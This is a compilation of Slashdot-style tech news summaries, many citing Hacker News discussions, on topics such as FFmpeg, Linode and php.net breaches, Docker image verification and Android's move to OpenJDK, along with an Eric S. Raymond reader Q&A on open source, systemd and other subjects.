An anonymous reader writes with a report that: Tamar Barbi, a 10th grade student living in Hod Hasharon, Israel, discovered that the theorem she was using to solve one of the problems on her geometry homework didn't actually exist. With the help of her teacher and mathematicians, she wrote up a proof for the theorem, which helps provide new and more elegant proofs for many other mathematical theorems. Posters at Hacker News have some skeptical words about the theorem's novelty, but also about the phrasing of the news report, which seems to omit some crucial words.

An anonymous reader writes: The milestone release FFmpeg 3.0 "Einstein" has been unleashed. For those who need a reminder, FFmpeg comprises several libraries and command-line tools (the main command-line tool being "ffmpeg") that encode, decode, transcode, and stream audio/visual data, etc. FFmpeg supports a multitude of codecs, filters, and container formats too numerous to mention here. FFmpeg is used by MPlayer, VLC, HandBrake, Chrome, and many other projects. Changes from 2.x to 3.0 include: a much better native AAC encoder, better hardware acceleration, and some API/ABI breakage. See this, this, this, this, and the changelog for much better descriptions of the improvements.

New submitter qmrq sends news that Linode, a major provider of virtual private servers, has been compromised again. In a blog post, they said, "A security investigation into the unauthorized login of three accounts has led us to the discovery of two Linode.com user credentials on an external machine. This implies user credentials could have been read from our database, either offline or on, at some point. The user table contains usernames, email addresses, securely hashed passwords and encrypted two-factor seeds." The Linode team said it found evidence of unauthorized access to three customer accounts. They don't yet know who is behind the attacks.

An employee for PagerDuty said they were compromised through Linode Manager all the way back in July. "In our situation the attacker knew one of our user's passwords and MFA secret. This allowed them to provide valid authentication credentials for an account in the Linode Manager. It's worth noting that all of our active user accounts had two-factor authentication enabled. ... We also have evidence from access logs provided by Linode that the attackers tried to authenticate as an ex-employee, whose username ONLY existed in the Linode database."

An anonymous reader writes: Google is ditching the Java application programming interfaces (APIs) in Android and moving to only OpenJDK. The news first came by a "mysterious Android codebase commit" from last month submitted to Hacker News. Google confirmed to VentureBeat that Android N will rely solely on OpenJDK. “As an open-source platform, Android is built upon the collaboration of the open-source community,” a Google spokesperson told VentureBeat. “In our upcoming release of Android, we plan to move Android’s Java language libraries to an OpenJDK-based approach, creating a common code base for developers to build apps and services. Google has long worked with and contributed to the OpenJDK community, and we look forward to making even more contributions to the OpenJDK project in the future.”

HughPickens.com writes: If Google sees that you're searching for specific programming terms, they may ask you to apply for a job as Max Rossett writes that three months ago while working on a project, he Googled "python lambda function list comprehension." The familiar blue links appeared on the search page, and he started to look for the most relevant one. But then something unusual happened. The search results split and folded back to reveal a box that said "You're speaking our language. Up for a challenge?" Clicking on the link took Rossett to a page called "foo.bar" that outlined a programming challenge and gave instructions on how to submit his solution. "I had 48 hours to solve it, and the timer was ticking," writes Rossett. "I had the option to code in Python or Java. I set to work and solved the first problem in a couple hours. Each time I submitted a solution, foo.bar tested my code against five hidden test cases."

After solving another five problems the page gave Rossett the option to submit his contact information and much to his surprise, a recruiter emailed him a couple days later asking for a copy of his resume. Three months after the mysterious invitation appeared, Rossett started at Google. Apparently Google has been using this recruiting tactic for some time.

An anonymous reader writes: The Next Web has confirmed reports from owners of Lenovo laptops that the company used a BIOS feature to install its software on the laptops even if a user wiped a device clean and reinstalled the operating system. "If Windows 7 or 8 is installed, the BIOS of the laptop checks 'C:\Windows\system32\autochk.exe' to see if it's a Microsoft file or a Lenovo-signed one, then overwrites the file with its own. Then, when the modified autochk file is executed on boot, another two files LenovoUpdate.exe and LenovoCheck.exe are created, which set up a service and download files when connected to the internet." Lenovo has published a patch to remove this functionality. The article notes that this technique seems to be sanctioned by a Microsoft policy. "Manufacturers are obligated to ensure that the mechanism can be updated if an attack is discovered and should be removable by the user, but the rules outlined in the document are fairly loose and don't require the OEM to notify the owner of the laptop that such a mechanism is in place."

An anonymous reader writes: Last week, Mozilla updated Firefox to add Pocket integration — software that lets you save web articles to read later. Over the weekend, some Firefox users began to voice their displeasure over the move on public forums like Bugzilla, Google Groups, and Hacker News. The complaints center around Pocket being a proprietary third-party service, which already exists as an add-on, and is not a required component for a browser. Integrating Pocket directly into Firefox means it cannot be removed, only disabled. In response, Mozilla has released a statement saying users like the integration and the integration code is open source.

Nerval's Lobster writes: Despite legislation making it overtly illegal, ageism persists in the IT industry. If you're 40 or older, you've probably seen cases where younger developers were picked over older ones. At times we're told there's a staffing crisis, that companies need to import more developers via H-1B, but the truth is that outsourcing and downsizing eliminated a subset of viable developers from the market. Those developers, in turn, had to figure out if they wanted to land another job, freelance, or leave the technology industry entirely. But older developers still have a lot to offer, developer David Bolton writes in a new column: They have decades of experience (and specialist knowledge), they have a healthy disregard for office politics (but can still manage, when necessary), they're available, and they're (generally) stable.

An anonymous reader writes: Nim is a young, statically typed programming language that has been getting more attention recently. See these articles for an introduction: What is special about Nim?, What makes Nim practical? and How I Start: Nim. The language offers a syntax inspired by Python and Pascal, great performance and C interfacing, and powerful metaprogramming capabilities. The author of "Unix in Rust" just abandoned Rust in favor of Nim and some early-adopter companies are starting to use it as well.

An anonymous reader writes Developer Jonathan Rudenberg has discovered and pointed out a glaring security hole in Docker's system. He says, "Recently while downloading an 'official' container image with Docker I saw this line: ubuntu:14.04: The image you are pulling has been verified

I assumed this referenced Docker's heavily promoted image signing system and didn't investigate further at the time. Later, while researching the cryptographic digest system that Docker tries to secure images with, I had the opportunity to explore further. What I found was a total systemic failure of all logic related to image security.

Docker's report that a downloaded image is 'verified' is based solely on the presence of a signed manifest, and Docker never verifies the image checksum from the manifest. An attacker could provide any image alongside a signed manifest. This opens the door to a number of serious vulnerabilities." Docker's lead security engineer has responded here.

blottsie (3618811) writes "On Thursday, the Guardian reported that secret-sharing app Whisper was tracking users' locations even when they opt-out of sharing their location. [See also this earlier, related story.] Whisper has denied the accusations—but this may be a matter of semantics. Whisper allegedly uses an outdated version of GeoIP by MaxMind, which uses your IP address to estimate your location on a map. Whisper's Chad DePue said in a comment on Hacker News that the tool is "so inaccurate as to be laughable," suggesting that determining something as broad as your country or state won't bother the basic user (and he could be right, but what is and isn't an upsetting degree of user information is another argument entirely)."

Linking to a story at Reuters, reader WilliamGeorge writes "Russia is further constraining access to the internet and freedom of speech, with new laws regarding public use of WiFi. Nikolai Nikiforov, the Russian Communications Minister, tweeted that "Identification of users (via bank cards, cell phone numbers, etc.) with access to public Wifi is a worldwide practice." This comes on top of their actions recently to block websites of political opponents to Russian president Vladimir Putin, require registration of prominent bloggers, and more. The law was put into effect with little notice and without the input of Russian internet providers. Sergei Plugotarenko, head of the Russian Electronic Communications Association, said "It was unexpected, signed in such a short time and without consulting us." He added, "We will hope that this restrictive tendency stops at some point because soon won't there be anything left to ban." In addition to the ID requirement to use WiFi, the new law also requires companies to declare who is using their web networks and calls for Russian websites to store their data on servers located in Russia starting in 2016." That's not the only crackdown in progress, though: former Slashdot code-wrestler Vlad Kulchitski notes that Russian users are being blocked from downloading Java with an error message that reads, in essence, "You are in a country on which there is embargo; you cannot download JAVA." Readers at Hacker News note the same, though comments there indicate that the block may rely on a " specific and narrow IP-block," rather than being widespread. If you're reading this from Russia, what do you find?

An anonymous reader writes Two months after OpenBSD's LibReSSL was announced, Adam Langley introduces Google's own fork of OpenSSL, called BoringSSL. "[As] Android, Chrome and other products have started to need some subset of these [OpenSSL] patches, things have grown very complex. The effort involved in keeping all these patches (and there are more than 70 at the moment) straight across multiple code bases is getting to be too much. So we're switching models to one where we import changes from OpenSSL rather than rebasing on top of them. The result of that will start to appear in the Chromium repository soon and, over time, we hope to use it in Android and internally too." First reactions are generally positive. Theo de Raadt comments, "Choice is good!!."

Last week you had the chance to ask ESR about books, guns, and open source software. Below you'll find his answers to those questions. What about protocols?
by Anonymous Coward

What are your feelings about protocols and file formats and keeping them open? Where do the efforts to keep protocols and file formats open and accessible to others fall on your list of priorities?

ESR: I don't think my answer will surprise you. When the function of software is defined by a requirement to be compatible with a protocol or file format, openness of the protocol or formats is even more important than the licensing status of any of the implementations around it.

The reason should be obvious. If the protocol is well documented and open, you can build open-source code to process it. On the other hand, if crucial parts are undocumented or (worse) require techniques that are under a non-royalty-free patent, *any* code touching it can have a serious problem.

There's a productive analogy with DNA and ribosomes here which I leave for the reader to fill in.



systemd
by Canek

As a long time "Unix philosophy" advocate, and in the light of the announced switch to it by Debian, Ubuntu, and basically every other major Linux distribution, what do you think of systemd, and the tight vertical integration it intends to bring as a standard plumbing for (most of) all Linux distributions?

ESR: I apologize; I haven't studied systemd in the detail that would be required for me to give a firm answer to this - it's been on my to-do list for a while, but I'm buried in other projects.

I want to study it carefully because I'm a bit troubled by what I hear about the feature set and the goals. From that, I fear it may be one of those projects that is teetering right at the edge of manageable complexity - OK as long as an architect with a strong sense of design discipline is running things, but very prone to mission creep and bloat and likely to turn into a nasty hairball over the longer term.

But this may be me being too pessimistic. I don't actually think I know yet.



here's an obvious one..
by Connie_Lingus

it's been almost 20 years since your write tCatB...i gave it a quick read and thought, "well, it *is* dated now, isn't it?" altho i am old enough to remember when its' ideas were pretty cutting edge. Given the current state of software development (ie the ease of use of PHP and the fact that, without a doubt, the cathedral model has won), what would you either like to change or add to your original thesis?

ESR: Um. What color is the sky on your planet? The one where the cathedral model has won, I mean.

What's happening on Earth is just the opposite - even where bazaar-mode development hasn't taken over, many organizations that would previously have run their projects in a cathedral style are trying really hard to flatten out hierarchies, lighten up, and co-opt the many-eyeballs effect in any way they can. This is pretty clear just from what shows up in my mailbox - and see my later response to a question about Apple, too.

I think there have been some significant shifts in methodology that would affect the book if I were writing it today. A big one is that systematic use of version control is now pervasive in a way it was not then (when CaTB was written, Subversion wasn't out of early alpha stage yet; git and hg weren't even imagined). Development workflow is now correspondingly much more centered around shared public repositories.

The effects of always being able to revert to known codebase states rapidly are subtle but very large. One obvious one is that the risk factor of exploration drops significantly. That includes the risk in taking patches from strangers.

Less obvious but just as important is how sharp version-control tools raise the effectiveness and reduce the friction cost of testing techniques. In 2001 we couldn't routinely run bisections to pinpoint bad code changes; our tools were too slow and clumsy. Now we can, and the effect is to make building good unit and regression-test suites both easier and more rewarding in defects squashed per hours invested.

The reason I'm going on about this is that, like any technique that increases our visibility into the code's behavioral space, better test suites tremendously amplify the positive effects of code review. Of course that feeds through into a differential competitive advantage for open source, because our process naturally recruits more code reviewers than closed-source shops can usually afford to hire.

Here's an example of the effect. There's a project I've led since about 2005 called GPSD, a service daemon that handles GPSes and other geodetic sensors. It's *everywhere* in mobile embedded systems, including your Android phone - we must have well over over a billion deployments by now. Yet our defect rate is so low that months go by at a time between single bug reports.

Why? Because I wrote a test suite with good coverage - and use a test strategy that relies on fast rollback capabilities I plain didn't have before modern version control. Changes in tools change the rules. It's much easier to get to the this-never-breaks level of reliability than it was when I wrote CatB, if you know what you're doing.

(For much more on this case study see my paper on the architecture of GPSD; there's a major section on engineering for high reliability.)

Open-source development has quite a few advantages over closed in exploiting this possibility - better tools, healthier culture, and just plain more developers. I think a major theme of the next decade is going to be learning to systematically capture these gains.



How to ask questions
by houstonbofh

When you wrote "How to ask questions" did you have any idea how big it would be? Or how long it would be relevant? And how do you feel that your most referenced piece of work is a howto for the clueless? :)

ESR: I'm not sure it is my most referenced piece of work. Either "How To Become A Hacker" or the Jargon File could easily be getting more hits; I haven't bothered to track this.

But supposing it is, that's OK. I expect it to be relevant for a very long time, because the newbies and the clueless are always with us.



Halloween Documents
by frdmfghtr

I recall reading (and re-reading on occasion) the Halloween Documents. Have you written anything regarding any other opponents to OSS, or perhaps a look back on them and see what the end effect of Microsoft's attempts did long term?

ESR: I haven't written a retrospective, or anything else really similar.

I think those documents had a pretty significant effect in legitimizing not buying the Microsoft lock-in. The trade press certainly thought so at the time, and the intervening decade and a half hasn't given me any reason to suppose they were wrong.



How essential is software redistribution rights?
by unixisc

One of the issues w/ Open Source has been the freedom to redistribute software downstream - be it just binaries, just source or any combination of the 2. Do you think there are any good ways for software companies who make their software open source to prevent their customers from effectively becoming their competitors - by giving away or selling cheaper what they were sold? Or is the only alternative going for a shared-source approach, as opposed to open source, where redistribution can be explicitly prohibited?

ESR: If your customers are selling your open-source software for a lower price than you are, then you're doing it wrong! You need to face the question of why you've attached a sales price to the software itself at all. I think that's a doomed approach.

You need to be thinking about monetizing that investment in a different way. The most obvious is service and consulting contracts around the code. You have the advantage there; as the originators, you are in a better position to add value to the bundle than your competitors are.

There are a couple other potential business models here, but none I can recommend without knowing more details about your situation. My advice in The Magic Cauldron is still quite relevant.



What about the new wave of proprietary programs
by necro351

So it seems these days the most effective method of DRM is a network interface, like that used by Facebook, Google, Pinterest, etc... You cannot run your own instance of Gmail or Facebook, and you certainly cannot see or modify the code. At the same time all these companies are pressuring us to push our data into their servers by not supporting or coming up with solutions that let us continue to control/manage our data on our own machines and private networks. What can open source do to stem that tide? What about open source licensing? Could webkit or Mozilla have slowed down the encroachment of Chrom/ium and its pro-Google agenda if it had more defensive licensing terms like something similar to the GPL? How do we convince hackers to hack on open-source 'website programs', like an open Gmail or an open Facebook (e.g., Diaspora)?

ESR: You're pointing at a real problem. I don't know of any near-term solutions beyond being very careful what services you allow to draw you into their web. I run my own mailserver, rather than using GMail, for exactly this reason. I don't use Facebook or Pinterest. I use G+ for nonessential things only.

I don't think defensive or reciprocal licensing can solve the problem, because it is not one created by code secrecy. The service providers are trading on real advantages of scale that they would still collect if every line of source code in their app stack were public; the value they're offering actually comes from ubiquity and synergy.

In fact I'm a little surprised they even bother maintaining code secrecy, it has nothing whatsoever to do with their value proposition. I think we're seeing a result of instinctive territoriality rather than rational thought.

I'd love to believe that projects like Diaspora are a long-term solution to the problem, but I don't - basically because no matter how attractive and ingenious your software is, it tales gobs of capital expenditure on server farms to scale up to where you're any kind of functional competition to Facebook/Google/Pinterest etc.

In the long term I think the way we'll win is if the giants have to compete with each other for business by giving their customers exit and recovery options. Google's Data Liberation Front is a positive early sign.



Linus's Law (Many Eyes) Problems
by carp3_noct3m

Hi, there is currently some debate about the many eyes theory over on HNews about why it's a fallacious argument, but in my view they have it all wrong, in that a core component of Linus's Law is that the amount of code is directly inverse to the amount of eyes that can hit all of that code (or a significant percentage). Therefore, in my eyes it is the problem of code bloat that is undermining the open source movement more than anything. For example, the Linux kernel is now at, what, 10mil+ lines of code? That's insane. Minix 3, on the other hand, is at ~15k?

What are your thoughts on this problem?

ESR: I think you raise a valid point about code bloat being a problem. On the other hand, the code-coverage effectiveness of individual developers is also rising for reasons I wrote about in response to a previous question - better tools and better testing strategies feeding back on each other in virtuous ways.

A lot of criticisms of Linus's Law (including the Hacker News thread, as far down as I read it) miss the point that "many eyeballs" isn't just about sheer volume of people reviewing code, it's about diversity of assumptions. You want people reviewing the code that don't all work for the same company and report to the same boss - people who speak different languages, different toolkits, different expertise areas.

A handful of people who think very differently may be more effective auditors than an army with identical blind-spots. By recruiting more people you're maximizing the odds of good diversity in the subgroup that actually reviews any given section of code.

I actually chuckled when I read the Hacker News thread, because I've seen this movie before after every serious security flap in an open-source tool. The script, which includes a bunch of people indignantly exclaiming that many-eyeballs is useless because bug X lurked in a dusty corner for Y months, is so predictable that I can anticipate a lot of the lines.

The mistake being made here is a classic example of Frederic Bastiat's things seen versus things unseen. Critics of Linus's Law overweight the bug they can *see* and underweight the high probability that equivalently positioned closed-source security flaws they *can't* see are actually far worse, just so far undiscovered.

That's how it seems to go whenever we get a hint of the defect rate inside closed-source blobs, anyway. As a very pertinent example, in the last couple months I've learned some things about the security-defect density in proprietary firmware on residential and small business Internet routers that would absolutely curl your hair. It's far, far worse than most people understand out there.

Friends don't let friends run factory firmware. You really do *not* want to be relying on anything less audited than OpenWRT or one of its kindred (DDWRT, or CeroWRT for the bleeding edge). And yet the next time any security flaw turns up in one of those open-source projects, we'll see a replay of the movie with yet another round of squawking about open source not working.

Ironically enough this will happen precisely because the open-source process *is* working ... while, elsewhere, bugs that are *far* worse lurk in closed-source router firmware. Things seen vs. things unseen...



Apple today
by wordtech

Your comments in The Art of Unix Programming about Apple/Mac developers being diametrically opposed to Unix developers in development style and emphases (designing simple, user-friendly interfaces from the outside in) were quite interesting. I am wondering about your perspective on Apple now. My interest is specifically in Apple's contributions to open-source (WebKit and LLVM, chiefly) and your take on those. It seems to me that Apple has done quite a bit to foster an alternative ecosystem to the GNU environment, for instance in FreeBSD's adoption of clang as their default compiler; and also it seems to to me that WebKit has supplanted Gecko as the most widely used browser framework. Curious about your viewpoint here.

ESR: In answering an earlier question I spoke of organizations that would previously have developed in a secretive cathedral mode adopting the bazaar model and open-source practices. Projects like LLVM and Webkit exemplify this trend.

The interesting thing about these projects is that they're not just facades. They really seem to welcome, not just as outside contributors but sometimes as full-time employees, people who are from the Unix-descended open-source culture (with its inside-to-out priorities) rather than interface-centric Mac guys.

That - and of course, OS X - tells us Apple's technical culture in't what it used to be. It's more Unix-influenced now, more open, has more hacker in it. Obviously that doesn't fix every problem with Apple - I'm with RMS in judging the locked-down, walled-garden design of their phones and tablets to be a very bad thing for users in the longer term - but it's movement in a good direction.



AK or AR
by gmhowell

Which is the better battle rifle, an AK-47/74 type or an AR-15/M-16/M-4 type? Please give your criteria as well as your answer. Bonus: favorite handgun platform/caliber that isn't a .45 1911.

ESR: "Better battle rifle" depends on who you're equipping, and for what. I lean towards the AR-15 because I'm from a culture that readily produces people with good marksmanship, fire discipline, and steadiness onder combat pressure. The AR-15 is the better weapon to match those traits - it rewards skill in the shooter and you can actually use it at distance.

On the other hand, if your troops are savages or bandits who can barely clean a weapon and for whom the natural mode is short-range spray'n'pray, the AK-47 is probably a better choice. It hardly rewards shooter skill at all, but handles egregious abuse under field conditions better.

As for what I like when I don't have .45ACP handy, my answer is easy and boring: .40S&W. Medium-caliber semis suit me very well. I don't mind shooting my wife's Glock .40 at all, and it's likely what I'd carry if not for John Moses Browning (peace be unto him)

An anonymous reader writes "VLC is incapable of increasing the actual power past 100%, all that is being done is the waveform is being modified to be louder within the allowed constraints. But, that didn't stop Dell from denying warranty service for speaker damage if the popular VLC Media Player is installed on a Dell laptop. Also we got a report that service was denied because KMPlayer was installed on a laptop. The warranty remains valid on the other parts of the laptop. VLC player developer [Jean-Baptiste Kempf] denied the issue with VLC and further claimed that the player cannot be used to damage speakers. How can I convince Dell to replace my laptop speaker which is still in warranty? Or class action is only my option?"

An anonymous reader writes: "It doesn't take a Columbo to figure out that the 'previous employer, a small browser vendor that decided to abandon its own rendering engine and browser stack' is referring to Opera in this comment answering the question 'Do you actually use the product you are working on?' It appears to originate from Andreas Tolfsen, a former Opera developer who is now part of the Mozilla project. From releasing a unified architecture browser including Linux support since 2001, Opera decided to put Linux development on indefinite hold, communicated through blog comments, and focus on Windows and Mac for their browser rewrite centered around the Blink engine that had its first beta release last spring. The promise to bring back the Linux version in due time was met with growing skepticism as the months went by, and clear answers have been avoided in the developer blog. The uncertainty has spawned user projects such as Otter browser in an attempt to recreate the Opera UI in a free application. Tolfsen's statement seem to be in line with what users have suspected all along: Opera for Linux is not something for the near future."

An anonymous reader writes: "It doesn't take a Columbo to figure out that the 'previous employer, a small browser vendor that decided to abandon its own rendering engine and browser stack' is referring to Opera in this comment answering the question 'Do you actually use the product you are working on?' It appears to originate from Andreas Tolfsen, a former Opera developer who is now part of the Mozilla project. From releasing a unified architecture browser including Linux support since 2001, Opera decided to put Linux development on indefinite hold, communicated through blog comments, and focus on Windows and Mac for their browser rewrite centered around the Blink engine that had its first beta release last spring. The promise to bring back the Linux version in due time was met with growing skepticism as the months went by, and clear answers have been avoided in the developer blog. The uncertainty has spawned user projects such as Otter browser in an attempt to recreate the Opera UI in a free application. Tolfsen's statement seem to be in line with what users have suspected all along: Opera for Linux is not something for the near future."

An anonymous reader writes "FreeBSD 10.0 has been released. A few highlights include: pkg is now the default package management utility. Major enhancements in virtualization, including the addition of bhyve, virtio, and native paravirtualized drivers providing support for FreeBSD as a guest operating system on Microsoft Hyper-V. Support for the high-performance LZ4 compression algorithm has been added to ZFS and TRIM support for SSD has been added to ZFS. clang is the default compiler. This release has official Raspberry Pi support. For a complete list of new features and known problems, please see the online release notes and a quick FreeBSD installation video is here. FreeBSD 10.0-RELEASE may be downloaded via ftp or via a torrent client that supports web seeding."

stoolpigeon writes "Yesterday marked the release of Dart SDK 1.0, a cross-browser, open source toolkit for structured web applications. The Dart SDK 1.0 includes everything you need to write structured web applications: a simple yet powerful programming language, robust tools, and comprehensive core libraries. The language has been somewhat controversial, but Google continues to move it forward." Reader slack_justyb adds some more detail: "The new release brings a much tighter dart2js compiler reducing overall JavaScript output up to 40%; Dartium — a version of Google Chrome that has the DartVM in addition to the JavaScript VM as native to the browser; PUB, a package manager for Dart add-ons; and several favorite 3rd party plug-ins that now come out-of-box, in addition to a lot of work for Dart server-side tools that can work to automate server side tasks and help in the construction of web pages. However Dart has many critics not only from the IE and Apple camps, as one would guess, but from the Firefox and Opera camps as well. In addition to the low adoption of Dart from third parties there are some asking where does Dart go from here? Especially considering that Google is one of the strongest pushers for EcmaScript 6."

An anonymous reader writes "Recent reports of MathML's demise have been greatly exaggerated. Given the amount of marketing dollars companies like Apple, Google, and Microsoft have spent trying to convince a buying public to purchase their wares as educational tools, you'd think they'd deliver more than lip service by now. MathJax team member, Peter Krautzberger, has compiled a great overview of the current state of MathML, the standard for mathematical content in publishing work flows, technical writing, and math software: "20 years into the web, math and science are still second class citizens on the web. While MathML is part of HTML 5, its adoption has seen ups and downs but if you look closely you can see there is more light than shadow and a great opportunity to revolutionize educational, scientific and technical communication.""

An anonymous reader writes "The open source PHP project site was compromised earlier today. The site appears to have been compromised and had some of its Javascript altered to exploit vulnerable systems visiting the website. Google's stop-badware system caught this as well and flagged php.net as distributing malware, warning users whose browsers support it not to visit the site. The comment by a Google employee over at the hacker news thread (official Google webmaster forum thread) seems to suggest that php.net wasn't incorrectly flagged."

redkemper writes with this news from BGR.com (based on a report at Hacker News), excerpting: "Android might be targeted by hackers and malware far more often than Apple's iOS platform, but that doesn't mean devices like the iPhone and iPad are immune to threats. A post on a Russian website draws attention to a fairly serious vulnerability that allows nefarious users to remotely crash apps on iOS 6, or even render them unusable. The vulnerability is seemingly due to a bug in Apple's CoreText font rendering framework, and OS X Mountain Lion is affected as well."

jones_supa writes "One day web developer Elliott Kember decided to switch from Safari to Chrome and in the process, discovered possibly a serious weakness with local password management in Chrome. The settings import tool forced the passwords to be always imported, which lead Kember to further investigate how the data can be accessed. For those who actually bother to look at the 'Saved passwords' page, it turns out that anyone with physical access can peek all the passwords in clear text very easily with a couple of mouse clicks. This spurred a lengthy discussion featuring Justin Schuh, the head of Chrome security, who says Kember is wrong and that this behavior of Chrome has been evaluated for years and is not going to change."

New submitter mha writes "In a response that truly seems to be from a core Microsoft developer, we are told about why Windows kernel development continues to fall further and further behind that of the Linux kernel. He says, 'The cause of the problem is social. There's almost none of the improvement for its own sake, for the sake of glory, that you see in the Linux world. ... There's no formal or informal program of systemic performance improvement. We started caring about security because pre-SP3 Windows XP was an existential threat to the business. Our low performance is not an existential threat to the business. See, component owners are generally openly hostile to outside patches: if you're a dev, accepting an outside patch makes your lead angry (due to the need to maintain this patch and to justify in in shiproom the unplanned design change), makes test angry (because test is on the hook for making sure the change doesn't break anything, and you just made work for them), and PM is angry (due to the schedule implications of code churn). There's just no incentive to accept changes from outside your own team. You can always find a reason to say "no," and you have very little incentive to say "yes."'"

An anonymous reader writes "Apple today posted its second Samsung apology to its UK website, complying with requests by the UK Court of Appeal to say its original apology was inaccurate and link to a new statement. As users on Hacker News and Reddit point out, however, Apple modified its website recently to ensure the message is never displayed without visitors having to scroll down to the bottom first."

An anonymous reader writes "Ex-Sun employees did what Sun/Oracle failed to do since the iPhone launched. They brought Java to iOS and other mobile devices. They are getting major coverage from Forbes, DDJ, hacker news and others. They are taking a unique approach of combining a Swing-like API with a open source and SaaS based solution."